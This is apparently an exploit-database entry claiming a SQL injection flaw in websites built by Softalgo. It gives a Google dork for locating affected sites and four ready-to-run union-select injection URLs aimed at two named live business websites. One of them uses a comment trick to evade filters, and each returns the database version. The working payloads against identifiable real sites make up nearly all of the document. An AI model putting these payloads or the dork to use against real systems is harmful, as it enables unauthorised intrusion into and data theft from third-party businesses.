*********************************************************
#Exploit Title: Softalgo – SQL Injection vulnerability
#Date: 2020-07-31
#Exploit Author: Behrouz Mansoori
#Google Dork: "Designed and Developed By Softalgo"
#Category:webapps
#Tested On: windows 10, Firefox
Proof of Concept:
Search google Dork: "Designed and Developed By Softalgo"
Demo 1:
https://www.43northapparel.com/category.php?id=-65%27%20union%20select%201--+
https://www.43northapparel.com/category.php?id=-65%27%20union%20select%20version()--+
Demo 2:
http://www.pnpphotorestoration.ca/photo.php?id=-57%27%20/*!12345union*/%20select%201,2,3,4,5,6,7--+
http://www.pnpphotorestoration.ca/photo.php?id=-57%27%20/*!12345union*/%20select%201,2,version(),4,5,6,7--+
*********************************************************
#Discovered by: Behrouz Mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
*********************************************************